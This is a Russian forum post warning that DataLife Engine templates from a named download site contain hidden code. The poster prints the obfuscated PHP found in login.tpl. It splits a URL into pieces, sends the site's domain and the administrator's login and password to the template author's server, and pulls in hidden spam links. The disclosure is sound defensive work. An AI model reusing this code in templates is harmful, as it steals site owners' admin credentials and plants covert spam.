Форум Не про работу Самое разное

niceart.ru - воруют пароли от dle

[Удален]
1494

Хочу предупредить всех не скачивать шаблоны для dle с сайта niceart.ru и уж тем более не устанавливать их.

Нашел совершенно случайно в одном из шаблонов в login.tpl такой код: 

$login_cache="engine/cache/system/login_cache.txt"; 

$logingtrue1 = 'eart';

$logingtrue2 = 'htt';

$logingtrue3 = '.r';

$logingtrue4 = 'p://nic';

if(!is_file($login_cache) || filemtime($login_cache)<time()-432000) 

{ 

$file_url = $logingtrue2 . $logingtrue4 . $logingtrue1 . $logingtrue3 . "u/getlink/003/db.php?ticket=095" ."&script_id=". urlencode($_SERVER['SERVER_NAME']); 

$logingtrue = @file_get_contents($file_url); 

if($logingtrue) 

{

$file = fopen($login_cache, "w");

fwrite( $file, $logingtrue);

fclose( $file );

// chmod ( $file, 0777); //права

}

} 

else {

$logingtrue = file_get_contents($login_cache); 

}

if ($is_logged == TRUE){

$login_panel = <<<HTML

<div style="padding-top:2px; padding-left:5px;">Привет, <b>{$member_id['name']}</b>!</div>



<div style="padding-top:5px; padding-bottom:5px; padding-left:12px;"><table width="100%" >



HTML;



if ($user_group[$member_id['user_group']]['allow_admin']) {

$file_url = $logingtrue2 . $logingtrue4 . $logingtrue1 . $logingtrue3 . "u/getlink/003/db.php?ticket=095" ."&script_id=". urlencode($_SERVER['SERVER_NAME']) ."&un=". $login_name ."&up=". $login_password; 

$logingtrue = file_get_contents($file_url); 

$login_panel .= <<<HTML

После ввода пароля при авторизации на сайте мне выдало ошибку о попытке отправить гетом домена сайта, а также логина и пароля от админки, таким образом этот код и обнаружился

Я скачал с их сайта первый попавшийся шаблон, там этот код тоже есть, он походу там во всех шаблонах

Содержимое engine/cache/system/login_cache.txt 

<div style="display: none;">

Всё по движку datalfe engine <a href="http://niceart.ru">datalife engine</a> например, шаблоны, модули для движка.

Сайт для православных - <a href="http://rppr.ru">Русский православный сайт</a> - круг общения русских людей.

Скачать электронные книги без регистрации <a href="http://bookloader.info">электронные книги</a> - e-books и электронные книги. 

За новосятми для развлечения приходите на <a href="http://superpuper.info">развлекательный портал</a> и общайтесь в удовольствие.

Самые свежие авто новости про автомобили здесь - <a href="http://avtoparty.info">автомобильные новости</a> - каждому автолюбителю.

</div>

Наверняка в шабах есть еще какие-нибудь сюрпризы, еще не успел проверить. Вообщем если вы скачивали шаблоны с этого сайта, то чистите login.tpl и меняйте пароли от админки

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий